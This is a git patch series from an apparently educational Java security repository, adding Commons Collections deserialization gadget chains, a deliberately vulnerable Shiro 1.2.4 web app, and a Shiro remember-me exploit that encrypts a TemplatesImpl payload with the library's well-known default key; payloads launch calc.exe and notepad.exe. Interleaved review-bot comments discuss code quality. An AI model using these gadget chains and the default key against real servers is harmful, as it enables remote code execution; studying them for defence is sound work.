From c76eb9fc4ecea2e3ecebb752578fbf7a4be26770 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 04:48:01 +0800 Subject: [PATCH 06/35] improve manual --- README.md | 20 ++++++++++++++----- ...ntro.java => CommonsCollectionsIntro.java} | 2 +- 2 files changed, 16 insertions(+), 6 deletions(-) rename general/src/main/java/com/govuln/deserialization/{CommonCollectionsIntro.java => CommonsCollectionsIntro.java} (96%)
diff --git a/README.md b/README.md
index 9b3d0b3..0b6b5f3 100644
--- a/README.md
+++ b/README.md
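Review bot: `fakeTransformers`, declared right after the `_tfactory` write, is never read — `transformerChain` is built from `transformers` directly — and four imports are unused as well (`InstantiateTransformer`, `LazyMap`, `Proxy`, `Templates`), which suggests the file was copied from CommonsCollections3.java without trimming. Remove the dead local and the unused imports, or add a comment stating why the local is kept; as it stands, a reader comparing the two files cannot tell whether the difference is intentional.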
@@ -18,11 +18,21 @@ - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) +- Java安全漫谈 - 14.认识CommonsCollections3 ## Demo代码 -- 我简化的[CommonCollections6](deserialization/src/main/java/com/govuln/CommonsCollections6.java),更方便大家理解 -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/HelloBCEL.java) +字节码: + +- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) + +反序列化: + +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) 
diff --git a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 96% rename from general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java rename to general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java index 51a0db5..61c4ba4 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java @@ -9,7 +9,7 @@ import java.util.HashMap; import java.util.Map; -public class CommonCollectionsIntro { +public class CommonsCollectionsIntro { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.getRuntime()), From 7efdcdf0549da724a108c6b8b2bd1657f778953e Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 04:49:31 +0800 Subject: [PATCH 07/35] edit path --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 0b6b5f3..8c1b4e2 100644 --- a/README.md +++ b/README.md 
@@ -31,8 +31,8 @@ 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) - 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/bytes/CommonsCollectionsIntro3.java) +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) From 88f2d9d85d5ffd00586268b60795eea04888efae Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:26:38 +0800 Subject: [PATCH 08/35] =?UTF-8?q?CommonsCollections6=E5=A4=9A=E5=91=BD?= =?UTF-8?q?=E4=BB=A4?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CommonsCollections6Multiple.java | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java new file mode 100644 index 0000000..17e8e1d --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java 
@@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections6Multiple { + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "notepad.exe" }), + new ConstantTransformer(1), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.remove("keykey"); + + Field f = 
ChainedTransformer.class.getDeclaredField("iTransformers"); + f.setAccessible(true); + f.set(transformerChain, transformers); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + // 本地测试触发 + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From 146b385eb9dc9c04e565e0037bb497c1e82393b2 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:36:15 +0800 Subject: [PATCH 09/35] update manual --- README.md | 1 + .../com/govuln/deserialization/CommonsCollections6Multiple.java | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 8c1b4e2..322b787 100644 --- a/README.md +++ b/README.md @@ -36,3 +36,4 @@ - 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java index 17e8e1d..aaf2282 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java 
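Review bot: The streams at the end of main are not managed as resources: `oos.close()` runs only when `writeObject` succeeds, and `ois` is never closed at all; both should be try-with-resources, and `Object o = (Object)ois.readObject();` carries a redundant cast and an unused local. The same manual `oos.close()` pattern recurs in `CommonsCollectionsShiro.getPayload` (patch 11) and `CommonsCollections6.getPayload` (patch 13). On a `ByteArrayOutputStream` the leak itself is harmless, but this is the idiom readers of a demo copy into real code.
```java
// … unchanged: transformer chain and map construction …
ByteArrayOutputStream barr = new ByteArrayOutputStream();
try (ObjectOutputStream oos = new ObjectOutputStream(barr)) {
    oos.writeObject(expMap);
}

// 本地测试触发
System.out.println(barr);
try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) {
    ois.readObject();
}
```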
@@ -59,7 +59,7 @@ public static void main(String[] args) throws Exception { oos.close(); // 本地测试触发 - System.out.println(barr); + System.out.println(barr); ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); Object o = (Object)ois.readObject(); } From 190f2b82ddb73f3582d9a26013cdc30896dfa437 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 23:37:30 +0800 Subject: [PATCH 10/35] 14 section --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 322b787..96434cf 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,7 @@ - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) -- Java安全漫谈 - 14.认识CommonsCollections3 +- [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) ## Demo代码 From 4366874f217ec8b65e872e3d934347fc80e35f50 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Tue, 9 Mar 2021 02:11:30 +0800 Subject: [PATCH 11/35] add shiro deserialization --- shiro/.gitignore | 31 +++++++ shiro/pom.xml | 75 +++++++++++++++++ .../java/org/vulhub/shiroattack/Client.java | 20 +++++ .../shiroattack/CommonsCollectionsShiro.java | 60 +++++++++++++ .../java/org/vulhub/shiroattack/Evil.java | 19 +++++ .../java/org/vulhub/shirodemo/MainRealm.java | 25 ++++++ .../org/vulhub/shirodemo/ShiroConfig.java | 46 ++++++++++ .../shirodemo/ShirodemoApplication.java | 13 +++ .../org/vulhub/shirodemo/UserController.java | 38 +++++++++ .../src/main/resources/application.properties | 1 + shiro/src/main/resources/templates/error.html | 12 +++ shiro/src/main/resources/templates/hello.html | 13 +++ shiro/src/main/resources/templates/login.html | 84 +++++++++++++++++++ 13 files changed, 437 insertions(+) create mode 100644 shiro/.gitignore create mode 100644 shiro/pom.xml create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/Client.java create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java create mode 100644 shiro/src/main/java/org/vulhub/shiroattack/Evil.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java create mode 100644 shiro/src/main/java/org/vulhub/shirodemo/UserController.java create mode 100644 shiro/src/main/resources/application.properties create mode 100644 shiro/src/main/resources/templates/error.html create mode 100644 shiro/src/main/resources/templates/hello.html create mode 100644 shiro/src/main/resources/templates/login.html diff --git a/shiro/.gitignore b/shiro/.gitignore new file mode 100644 index 0000000..a2a3040 --- /dev/null +++ b/shiro/.gitignore 
@@ -0,0 +1,31 @@ +HELP.md +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/** +!**/src/test/** + +### STS ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### IntelliJ IDEA ### +.idea +*.iws +*.iml +*.ipr + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ + +### VS Code ### +.vscode/ diff --git a/shiro/pom.xml b/shiro/pom.xml new file mode 100644 index 0000000..85dad86 --- /dev/null +++ b/shiro/pom.xml @@ -0,0 +1,75 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.2.2.RELEASE + + + org.vulhub + shirodemo + 1.0-SNAPSHOT + shirodemo + Demo project for Spring Boot and Shiro + + + 1.8 + + + + + org.springframework.boot + spring-boot-starter-thymeleaf + 2.2.2.RELEASE + + + org.springframework.boot + spring-boot-starter-web + 2.2.2.RELEASE + + + + org.projectlombok + lombok + 1.18.10 + true + + + + org.apache.shiro + shiro-core + 1.2.4 + + + + org.apache.shiro + shiro-spring + 1.2.4 + + + + commons-collections + commons-collections + 3.2.1 + + + + org.javassist + javassist + 3.27.0-GA + + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + + + diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Client.java b/shiro/src/main/java/org/vulhub/shiroattack/Client.java new file mode 100644 index 0000000..3b7abd2 --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shiroattack/Client.java 
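Review bot: shiro/pom.xml pins `shiro-core 1.2.4` and `commons-collections 3.2.1`, and nothing in the file says these versions are chosen because they are the ones this demo needs; anyone who copies the pom into another project inherits them. An XML comment above the dependencies, e.g. `<!-- intentionally old versions: this module demonstrates a remember-me deserialization weakness addressed in later Shiro releases; do not reuse in real projects -->`, would make that explicit. The same pins reappear in shiroattack/pom.xml in patch 13.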
@@ -0,0 +1,20 @@
+package org.vulhub.shiroattack;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.util.ByteSource;
+
+public class Client {
+ public static void main(String []args) throws Exception {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass clazz = pool.get(Evil.class.getName());
+ byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode());
+
+ AesCipherService aes = new AesCipherService();
+ byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+
+ ByteSource ciphertext = aes.encrypt(payloads, key);
+ System.out.printf(ciphertext.toString());
+ }
+}
diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java
new file mode 100644
index 0000000..ae0569f
--- /dev/null
+++ b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java
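Review bot: `System.out.printf(ciphertext.toString());` uses the data as the format string, so any `%` in the output is parsed as a conversion and can raise `java.util.MissingFormatArgumentException` or corrupt the output; use `System.out.println(ciphertext.toString());` or `System.out.printf("%s%n", ciphertext);`. The Base64 literal decoded into `key` is not explained; if it is, as the demo implies, the fixed remember-me key that ships with the pinned Shiro 1.2.4, say so with a comment such as `// the library's built-in default remember-me key for this Shiro version; the demo only applies to a server that never replaced it`. `java.util.Base64` is also referenced fully qualified while everything else is imported at the top; import it for consistency.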
@@ -0,0 +1,60 @@ +package org.vulhub.shiroattack; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollectionsShiro { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public byte[] getPayload(byte[] clazzBytes) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer transformer = new InvokerTransformer("getClass", null, null); + + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, transformer); + + TiedMapEntry tme = new TiedMapEntry(outerMap, obj); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.clear(); + setFieldValue(transformer, "iMethodName", "newTransformer"); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + return barr.toByteArray(); + } + + public static void main(String []args) throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(Evil.class.getName()); + + System.out.println("Class " + Evil.class.getName() + "'s bytecode is generate."); + new 
CommonsCollectionsShiro().getPayload(clazz.toBytecode()); + } +} \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java b/shiro/src/main/java/org/vulhub/shiroattack/Evil.java new file mode 100644 index 0000000..ae12bba --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shiroattack/Evil.java @@ -0,0 +1,19 @@ +package org.vulhub.shiroattack; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +public class Evil extends AbstractTranslet { + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} + + public Evil() throws Exception { + super(); + System.out.println("Hello TemplatesImpl"); + Runtime.getRuntime().exec("calc.exe"); + } +} \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java new file mode 100644 index 0000000..7e8b67e --- /dev/null +++ b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java 
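Review bot: `setFieldValue` looks fields up with `obj.getClass().getDeclaredField(...)`, which searches only the runtime class itself, never its superclasses; it works for the `_bytecodes`/`_name`/`_tfactory` and `iMethodName` fields used here presumably because they are declared directly on the classes involved, but a caller passing a subclass instance gets `NoSuchFieldException`. A comment on the helper such as `// getDeclaredField does not walk superclasses; only use with fields declared on obj's own class` would prevent misuse. `getPayload` also has no Javadoc; document `clazzBytes` (raw class-file bytes placed into `_bytecodes`) and that the return value is the Java-serialized `expMap`.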
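Review bot: The `Evil` constructor declares `throws Exception` although the only checked exception visible in its body is the `IOException` from `Runtime.exec`; narrow it to `throws IOException`. The two empty `transform` overrides have no comment, so a reader cannot tell whether logic is missing; `// required by AbstractTranslet; intentionally no-ops` settles it. A one-line class Javadoc saying this is the class `CommonsCollectionsShiro` packs into `_bytecodes` would also help readers navigate the module.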
@@ -0,0 +1,25 @@
+package org.vulhub.shirodemo;
+
+import org.apache.shiro.authc.*;
+import org.apache.shiro.authz.AuthorizationInfo;
+import org.apache.shiro.realm.AuthorizingRealm;
+import org.apache.shiro.subject.PrincipalCollection;
+
+public class MainRealm extends AuthorizingRealm {
+
+ @Override
+ protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) {
+ return null;
+ }
+
+ @Override
+ protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException {
+ String username = (String) authenticationToken.getPrincipal();
+ String password = new String((char [])authenticationToken.getCredentials());
+ if (username.equals("admin") && password.equals("vulhub")) {
+ return new SimpleAuthenticationInfo(username, password, getName());
+ } else {
+ throw new IncorrectCredentialsException("Username or password is incorrect.");
+ }
+ }
+}
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java
new file mode 100644
index 0000000..9dfdc1b
--- /dev/null
+++ b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java
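Review bot: `username.equals("admin")` dereferences the principal before checking it, so a token with a null principal ends in `NullPointerException` instead of the realm's own `IncorrectCredentialsException`; write `"admin".equals(username)`. `password.equals("vulhub")` is a plain short-circuiting comparison against a hard-coded credential, which is acceptable only because this realm is a fixture, and that should be stated: `// demo fixture: fixed credentials, not a constant-time comparison; a real realm uses a hashed credentials matcher`. `doGetAuthorizationInfo` returning `null` likewise deserves a comment that no authorization data is provided on purpose.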
@@ -0,0 +1,46 @@
+package org.vulhub.shirodemo;
+
+import org.apache.shiro.mgt.RememberMeManager;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.web.mgt.CookieRememberMeManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+import java.util.LinkedHashMap;
+import java.util.Map;
+
+@Configuration
+public class ShiroConfig {
+ @Bean
+ MainRealm mainRealm() {
+ return new MainRealm();
+ }
+
+ @Bean
+ RememberMeManager cookieRememberMeManager() {
+ return new CookieRememberMeManager();
+ }
+
+ @Bean
+ SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) {
+ DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
+ manager.setRealm(mainRealm);
+ manager.setRememberMeManager(cookieRememberMeManager);
+ return manager;
+ }
+
+ @Bean(name="shiroFilter")
+ ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) {
+ ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
+ bean.setSecurityManager(securityManager);
+ bean.setLoginUrl("/login");
+ bean.setUnauthorizedUrl("/unauth");
+ Map map = new LinkedHashMap<>();
+ map.put("/doLogin", "anon");
+ map.put("/**", "user");
+ bean.setFilterChainDefinitionMap(map);
+ return bean;
+ }
+}
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java
new file mode 100644
index 0000000..46303d0
--- /dev/null
+++ b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java
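Review bot: `cookieRememberMeManager()` returns a `CookieRememberMeManager` without calling `setCipherKey`, so remember-me cookies are protected with whatever key the library defaults to, which for the pinned `shiro-core 1.2.4` is, as far as I know, a fixed key shared by every installation and exactly what Client.java in this patch assumes. That is the point of the demo, but nothing in the config says so; add `// demo: deliberately left on the library default cipher key; real deployments must set a per-deployment random key via setCipherKey(...)` above the `return`. Separately, `Map map = new LinkedHashMap<>();` is a raw type; `Map<String, String> map = new LinkedHashMap<>();` matches what `setFilterChainDefinitionMap` takes.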
@@ -0,0 +1,13 @@
+package org.vulhub.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShirodemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShirodemoApplication.class, args);
+ }
+
+}
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java
new file mode 100644
index 0000000..4317c69
--- /dev/null
+++ b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java
@@ -0,0 +1,38 @@
+package org.vulhub.shirodemo;
+
+import org.apache.shiro.SecurityUtils;
+import org.apache.shiro.authc.AuthenticationException;
+import org.apache.shiro.authc.UsernamePasswordToken;
+import org.apache.shiro.subject.Subject;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.*;
+
+@Controller
+public class UserController {
+ @PostMapping("/doLogin")
+ public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue = "") String rememberMe) {
+ Subject subject = SecurityUtils.getSubject();
+ try {
+ subject.login(new UsernamePasswordToken(username, password, rememberMe.equals("remember-me")));
+ } catch (AuthenticationException e) {
+ return "forward:/login";
+ }
+
+ return "forward:/";
+ }
+
+ @RequestMapping("/")
+ public String helloPage() {
+ return "hello";
+ }
+
+ @RequestMapping("/unauth")
+ public String errorPage() {
+ return "error";
+ }
+
+ @RequestMapping("/login")
+ public String loginPage() {
+ return "login";
+ }
+}
diff --git a/shiro/src/main/resources/application.properties b/shiro/src/main/resources/application.properties
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/shiro/src/main/resources/application.properties
@@ -0,0 +1 @@
+
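Review bot: The `catch (AuthenticationException e)` in `doLoginPage` discards the exception and forwards to `/login`, so failed logins leave no trace anywhere, which is the one event an operator most wants to see. Log it before returning, e.g. `log.warn("login failed for user {}: {}", username, e.getMessage());` with a `private static final Logger log = LoggerFactory.getLogger(UserController.class);` field (SLF4J is normally on the classpath through the Spring Boot starter). Log the username and the message only, never the password.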
diff --git a/shiro/src/main/resources/templates/error.html b/shiro/src/main/resources/templates/error.html new file mode 100644 index 0000000..2e5f137 --- /dev/null +++ b/shiro/src/main/resources/templates/error.html @@ -0,0 +1,12 @@ + + + + + Error + + + +

login error

+ + + \ No newline at end of file diff --git a/shiro/src/main/resources/templates/hello.html b/shiro/src/main/resources/templates/hello.html new file mode 100644 index 0000000..26d0701 --- /dev/null +++ b/shiro/src/main/resources/templates/hello.html @@ -0,0 +1,13 @@ + + + + + Congrats + + + +

Congrats

+

You have successfully logged in

+ + + \ No newline at end of file diff --git a/shiro/src/main/resources/templates/login.html b/shiro/src/main/resources/templates/login.html new file mode 100644 index 0000000..b8e743b --- /dev/null +++ b/shiro/src/main/resources/templates/login.html @@ -0,0 +1,84 @@ + + + + + Login Page + + + + + + + From 733ecaf6115f3ba7d3ceae9891a0e5a5e990904a Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 9 Mar 2021 02:12:55 +0800 Subject: [PATCH 12/35] remove unused main method --- .../org/vulhub/shiroattack/CommonsCollectionsShiro.java | 8 -------- 1 file changed, 8 deletions(-) diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java index ae0569f..2f69fef 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java +++ b/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java @@ -49,12 +49,4 @@ public byte[] getPayload(byte[] clazzBytes) throws Exception { return barr.toByteArray(); } - - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(Evil.class.getName()); - - System.out.println("Class " + Evil.class.getName() + "'s bytecode is generate."); - new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - } } \ No newline at end of file From 95532469fcd99b94f66f2f1548837d2ded4a0dbc Mon Sep 17 00:00:00 2001 
From: phith0n Date: Fri, 26 Mar 2021 04:11:43 +0800 Subject: [PATCH 13/35] update --- shiro/.gitignore | 31 ----- shiro/pom.xml | 75 ------------ .../java/org/vulhub/shirodemo/MainRealm.java | 25 ---- .../org/vulhub/shirodemo/ShiroConfig.java | 46 -------- .../shirodemo/ShirodemoApplication.java | 13 --- .../org/vulhub/shirodemo/UserController.java | 38 ------ .../src/main/resources/application.properties | 1 - shiro/src/main/resources/templates/error.html | 12 -- shiroattack/pom.xml | 96 ++++++++++++++++ shiroattack/shiroattack.iml | 2 + .../java/com/govuln}/shiroattack/Client.java | 4 +- .../shiroattack/CommonsCollections6.java | 55 +++++++++ .../shiroattack/CommonsCollectionsShiro.java | 7 +- .../java/com/govuln}/shiroattack/Evil.java | 2 +- .../java/com/govuln/shiroattack/Wrong.java | 17 +++ shirodemo/pom.xml | 108 ++++++++++++++++++ shirodemo/shirodemo.iml | 2 + shirodemo/src/main/webapp/WEB-INF/shiro.ini | 20 ++++ shirodemo/src/main/webapp/WEB-INF/web.xml | 26 +++++ .../src/main/webapp/index.jsp | 1 + .../src/main/webapp/login.jsp | 29 ++--- 21 files changed, 348 insertions(+), 262 deletions(-) delete mode 100644 shiro/.gitignore delete mode 100644 shiro/pom.xml delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java delete mode 100644 